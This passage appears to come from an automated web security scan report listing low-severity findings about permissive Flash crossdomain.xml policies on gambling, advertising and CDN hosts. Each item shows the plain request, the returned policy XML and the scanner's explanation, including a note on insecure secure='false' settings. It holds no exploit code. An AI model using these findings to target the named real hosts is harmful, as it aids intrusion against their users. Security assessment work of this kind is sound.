The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: no.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pfap3l45eho50l2zq02tfmr1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.95. http://no.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://no.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: no.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:31 GMT
Accept-Ranges: bytes
ETag: "7a9026fb47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:30:36 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.96. http://no.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://no.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: no.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rwuc15iocbn0hh45vaf0jf45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.97. http://no.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://no.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: no.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=te3n2x34yqyh4a55ikncaw55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.98. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:39:12 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.99. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 16 May 2011 11:12:37 GMT
Expires: Tue, 17 May 2011 11:12:37 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 5832
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.100. http://primescratchcards.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: primescratchcards.com

Response

HTTP/1.1 200 OK
Content-Length: 286
Content-Type: text/xml
Last-Modified: Thu, 31 Dec 2009 01:34:45 GMT
Accept-Ranges: bytes
ETag: "daca8c6eb989ca1:357c"
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:40:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*.primescratchcards.com"/>
...[SNIP]...

4.101. http://pt.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pt.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.bigmoneyscratch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ukzmxuj5jko3qk45she00efs; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.102. http://pt.crazyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pt.crazyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 08:48:40 GMT
Accept-Ranges: bytes
ETag: "3277a0048b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:30 GMT
Connection: close
Content-Length: 280

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="crazyscratch.com" />
   <allow-access-from domain="*.crazyscratch.com" />
...[SNIP]...

4.103. http://pt.karamba.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pt.karamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.karamba.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:01:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5wfm3eyqdgnrq3eblixkkuqv; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.104. http://pt.scratch2cash.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pt.scratch2cash.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.scratch2cash.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tigbgujcfcltnircglsds3vh; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 908

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.105. http://pt.scratchcardheaven.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pt.scratchcardheaven.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pt.scratchcardheaven.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=khanudn1lscfxgjtuuy2l4q1; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 909

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.scratch2cash.com" />
   <allow-access-from domain="*.hopa.com" />
   <allow-access-from domain="*.neogames-tech.com" />
   <allow-access-from domain="*.wingrattage.com" />
   <allow-access-from domain="*.winnings.com" />
   <allow-access-from domain="*.crazyscratch.com" />
   <allow-access-from domain="*.luckyacefeeds.com" />
   <allow-access-from domain="*.netticasino.com" />
   <allow-access-from domain="*.slotsandgames.com" />
   <allow-access-from domain="*.topscratch.com" />
   <allow-access-from domain="*.extraspel.com" />
   <allow-access-from domain="*.primewinners.com" />
   <allow-access-from domain="*.superfortuna.it" />
   <allow-access-from domain="*.cdnfo.com" />
   <allow-access-from domain="*.postcodelottery.com" />
   <allow-access-from domain="*.mrspil.com" />
...[SNIP]...

4.106. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Mon, 16 May 2011 03:47:50 GMT
Expires: Tue, 17 May 2011 03:47:50 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 32661
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.107. https://secure.neogames-tech.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

The allow-access-from element shown in the response also carries secure="false". Because this policy is served over HTTPS, that attribute permits SWF files loaded over plain HTTP from the matching domains to read data from the HTTPS host, so anyone able to tamper with unencrypted traffic to any *.neogames-tech.com host gains read access to content this server protects with TLS. The default for a policy served over HTTPS is secure="true", and it should be left in place unless the HTTP origins are trusted to the same degree as the HTTPS ones.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 305
Content-Type: text/xml
Last-Modified: Wed, 04 Aug 2010 09:29:36 GMT
Accept-Ranges: bytes
ETag: "54fca8db733cb1:1396"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...

4.108. http://server.iad.liveperson.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:d1a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
Date: Mon, 16 May 2011 11:41:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.109. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Mon, 16 May 2011 12:49:44 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.110. http://sv.bigmoneyscratch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sv.bigmoneyscratch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

